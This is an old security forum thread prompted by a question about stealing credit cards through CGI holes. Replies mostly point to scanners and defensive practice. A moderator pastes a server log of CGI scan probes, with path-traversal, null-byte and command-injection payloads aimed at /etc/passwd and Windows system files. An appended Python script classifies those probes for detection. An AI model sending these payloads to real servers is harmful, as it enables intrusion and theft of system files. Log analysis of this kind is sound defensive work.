mimino Just Arrived
Joined: 06 Apr 2003 Posts: 0
Posted: Tue Apr 08, 2003 7:48 pm Post subject: using CGI vulnerabilities...
Hi, one of my friends is doing something on the inet all night long; to my question he replies that he's hacking some web databases and getting the 100-Megs! of cc-s (credit cards)... I know that he's doing that using CGI vulnerabilities and exploits, but he doesn't tell me how... If anybody can describe the process of using CGI vulnerabilities like ShaolinTiger did about the proxies... what programs to use... from what sites... I think it will be very interesting for all of us...
Rottz Just Arrived
Joined: 29 Mar 2003 Posts: 3 Location: East Coast, USA
Posted: Tue Apr 08, 2003 9:03 pm Post subject: Re: using CGI vulnerabilities...
mimino wrote: |
Hi, one of my friends is doing something on the inet all night long; to my question he replies that he's hacking some web databases and getting the 100-Megs! of cc-s (credit cards)... I know that he's doing that using CGI vulnerabilities and exploits, but he doesn't tell me how... If anybody can describe the process of using CGI vulnerabilities like ShaolinTiger did about the proxies... what programs to use... from what sites... I think it will be very interesting for all of us... |
Well to start with, Phrack has a good paper on CGI Security Holes which will give you basic knowledge of what CGI scripts are and how they are vulnerable to abuse and attacks.
Then you'd use a program called a CGI scanner to scan for thousands of known web application holes, like with Nikto or Whisker, which of course are educational tools.
If you want to protect yourself from CGI attacks, you would use a CGI wrapper that would prevent attacks against your scripts before they ever reach them.
Also learning how to write secure CGI scripts and basic web security is always a good thing.
Knowledge is power, don't abuse it.
Last edited by Rottz on Fri Apr 11, 2003 10:48 pm; edited 1 time in total
ShaolinTiger Forum Fanatic
Joined: 18 Apr 2002 Posts: 16777215 Location: Kuala Lumpur, Malaysia
Posted: Tue Apr 08, 2003 9:04 pm Post subject: Re: using CGI vulnerabilities...
Rottz wrote: |
Well to start with, Phrack has a good paper on CGI Security Holes which will give you basic knowledge of what CGI scripts are and how they are vulnerable to abuse and attacks.
Then you'd use a program called a CGI scanner to scan for thousands of known web application holes, like with Nikto or Whisker, which of course are educational tools.
If you want to protect yourself from CGI attacks, you would use a CGI wrapper that would prevent attacks against your scripts before they ever reach them.
Also learning how to write secure CGI scripts and basic web security is always a good thing.
Knowledge is power, don't abuse it. |
Excellent post Rottz.
Welcome aboard, hope to see more from you.
We need more people with a clue around here.
Rottz Just Arrived
Joined: 29 Mar 2003 Posts: 3 Location: East Coast, USA
Posted: Tue Apr 08, 2003 9:27 pm Post subject: Re: using CGI vulnerabilities...
ShaolinTiger wrote: |
Excellent post Rottz.
Welcome aboard, hope to see more from you.
We need more people with a clue around here. |
Yea, I've been lurking around here for a while. I tried to start my own BB but it's hard to start and get people active, and you seem to have already done a very good job and have almost all the bases covered well, so I guess I'll just jump aboard, no point in redoing what is already done well.
Not sure how much of a "clue" I have, but I know where to get one.
Bow down to the ol mighty Google!
Last edited by Rottz on Fri Apr 11, 2003 10:49 pm; edited 1 time in total
flw Forum Fanatic
Joined: 27 May 2002 Posts: 16777215 Location: U.S.A.
Posted: Tue Apr 08, 2003 9:33 pm Post subject:
Rottz, nice depth in your post.
delete852 Just Arrived
Joined: 19 Nov 2002 Posts: 4 Location: Washington DC
Posted: Tue Apr 08, 2003 9:35 pm Post subject:
Google and techtutorials.com. I love that site.
Anyway welcome aboard.
Guest
Posted: Tue Apr 08, 2003 10:18 pm Post subject: Re: using CGI vulnerabilities...
Rottz wrote: |
ShaolinTiger wrote: |
Excellent post Rottz. |
Not sure how much of a "clue" I have, but I know where to get one.
Bow down to the ol mighty Google! |
Wazzzaaa Rottz. Yea, all bow to the almighty Google. BTW, found a nice paper about Google and how you can use it for your pentests:
http://www.digivill.net/~mowse/code/mowse-googleknowledge.pdf
ThePsyko SF Mod
Joined: 17 Oct 2002 Posts: 16777178 Location: California
Posted: Wed Apr 09, 2003 1:45 am Post subject:
I haven't bothered to fingerprint this particular CGI scanner yet, but I found the following CGI scan in my logs last week (IP and dates removed) - it's always interesting to see what the skidiots are scanning for - I'd be willing to bet they wouldn't be able to exploit a single one of these without a tool.
"GET ///server-info HTTP/1.0" 404 -
"GET ///server-status HTTP/1.0" 404 -
"HEAD /site/eg/ HTTP/1.0" 404 -
"HEAD /doc/ HTTP/1.0" 404 -
"HEAD /~nobody/ HTTP/1.0" 404 -
"GET ///manual/ HTTP/1.0" 404 -
"GET ///php/php.exe?c:\\boot.ini HTTP/1.0" 404 -
"HEAD /code/ HTTP/1.0" 404 -
"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/test-cgi.bat?|ver HTTP/1.0" 404 -
"HEAD /error/ HTTP/1.0" 404 -
"GET /cgi-bin/ad.cgi HTTP/1.0" 404 -
"GET /cgi-bin/aglimpse HTTP/1.0" 404 -
"GET /cgi-bin/AnyForm2 HTTP/1.0" 404 -
"GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/bsguest.cgi HTTP/1.0" 404 -
"GET /cgi-bin/bslist.cgi HTTP/1.0" 404 -
"GET /cgi-bin/campas HTTP/1.0" 404 -
"GET //carbo.dll HTTP/1.0" 404 -
"GET /cgi-bin/count.cgi HTTP/1.0" 404 -
"GET /cgi-bin/cgforum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/faxsurvey HTTP/1.0" 404 -
"GET /cgi-bin/gbook.cgi HTTP/1.0" 404 -
"GET /cgi-bin/htsearch HTTP/1.0" 404 -
"GET /cgi-bin/htmlscript HTTP/1.0" 404 -
"GET /cgi-bin/jj HTTP/1.0" 404 -
"HEAD /technote/ HTTP/1.0" 404 -
"GET /cgi-bin/mmstdod.cgi HTTP/1.0" 404 -
"GET /cgi-bin/newdesk HTTP/1.0" 404 -
"GET /cgi-bin/register.cgi HTTP/1.0" 404 -
"GET /cgi-bin/simplestguest.cgi HTTP/1.0" 404 -
"GET /cgi-bin/statusconfig.pl HTTP/1.0" 404 -
"HEAD /iisadmpwd/ HTTP/1.0" 404 -
"GET /cgi-bin/webgais HTTP/1.0" 404 -
"GET /cgi-bin/perl.exe HTTP/1.0" 404 -
"HEAD /cgi-dos/ HTTP/1.0" 404 -
"HEAD /scripts/ HTTP/1.0" 404 -
"GET /cgi-bin/infosrch.cgi HTTP/1.0" 404 -
"GET /cgi-bin/rguest.exe HTTP/1.0" 404 -
"GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 -
"HEAD /Admin_files/ HTTP/1.0" 404 -
"HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 -
"GET //quote.html?filename=../../../../../../../../../../../../../../../../etc/passwd&path_to_font_file=ariali.ttf HTTP/1.0" 404 -
"GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/dcboard.cgi HTTP/1.0" 404 -
"GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 -
"GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 -
"GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 -
"HEAD /foldoc/ HTTP/1.0" 404 -
"HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 -
"GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 -
"GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/mailnews.cgi HTTP/1.0" 404 -
"GET /cgi-bin/newsdesk.cgi HTTP/1.0" 404 -
"GET /cgi-bin/pals-cgi HTTP/1.0" 404 -
"HEAD /ROADS/ HTTP/1.0" 404 -
"GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 -
"HEAD /way-board/ HTTP/1.0" 404 -
"GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 -
"GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/get32.exe HTTP/1.0" 404 -
"GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 -
"GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 -
"GET /cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/story.pl?next=../../../etc/passwd%00 HTTP/1.0" 404 -
"GET //ftp.pl?dir=../../../../../../ HTTP/1.0" 404 -
"GET /cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output_number=10 HTTP/1.0" 404 -
"HEAD /cowsconf/ HTTP/1.0" 404 -
"HEAD /cgi-bin/cowsconf/ HTTP/1.0" 404 -
"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -
"HEAD /cg-bin/ HTTP/1.0" 404 -
"GET /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.0" 404 -
"HEAD /examples/ HTTP/1.0" 404 -
"HEAD /perl/ HTTP/1.0" 404 -
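Added example, not part of ThePsyko's post: a small log triage script that tags request lines in the format shown above by probe technique and flags a run of distinct 404 misses as a scan. The signature names, the `min_misses` threshold and the final 200 line are assumptions made for illustration; the other sample lines are copied from the excerpt above.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Request-line format of the excerpt: "METHOD target HTTP/x.y" status size
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3}) \S+')

# Signatures are matched against the URL-decoded target (names are illustrative).
# shell_metachar can hit legitimate ';'-separated query strings, so treat it as a hint.
SIGNATURES = {
    "path_traversal": re.compile(r"\.\./"),
    "null_byte": re.compile(r"\x00"),
    "shell_metachar": re.compile(r"\?.*[;|]"),
    "sensitive_file": re.compile(r"/etc/passwd|boot\.ini|win\.ini", re.I),
}

def classify(line):
    """Return (decoded_target, status, sorted tags), or None if the line does not parse."""
    m = LINE_RE.search(line)
    if not m:
        return None
    target = unquote_plus(m.group("target"))  # decode %2F, %00, %3B, '+' before matching
    tags = sorted(name for name, rx in SIGNATURES.items() if rx.search(target))
    return target, int(m.group("status")), tags

def summarize(lines, min_misses=5):
    """Count tags; flag a scan when many distinct targets 404 and any signature fired."""
    tag_counts, missed = Counter(), set()
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        target, status, tags = parsed
        tag_counts.update(tags)
        if status == 404:
            missed.add(target)
    return tag_counts, len(missed) >= min_misses and bool(tag_counts)

SAMPLE = [
    '"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -',
    '"GET /cgi-bin/test-cgi.bat?|ver HTTP/1.0" 404 -',
    '"GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 -',
    '"GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 -',
    '"GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 -',
    '"HEAD /scripts/ HTTP/1.0" 404 -',
    '"GET /index.html HTTP/1.0" 200 1043',  # constructed benign line for contrast
]

if __name__ == "__main__":
    counts, is_scan = summarize(SAMPLE)
    print(dict(counts), "scan suspected:", is_scan)
```

Decoding before matching is what lets the `..%2F` and `%3B` variants in the excerpt land in the same bucket as their plain-text forms.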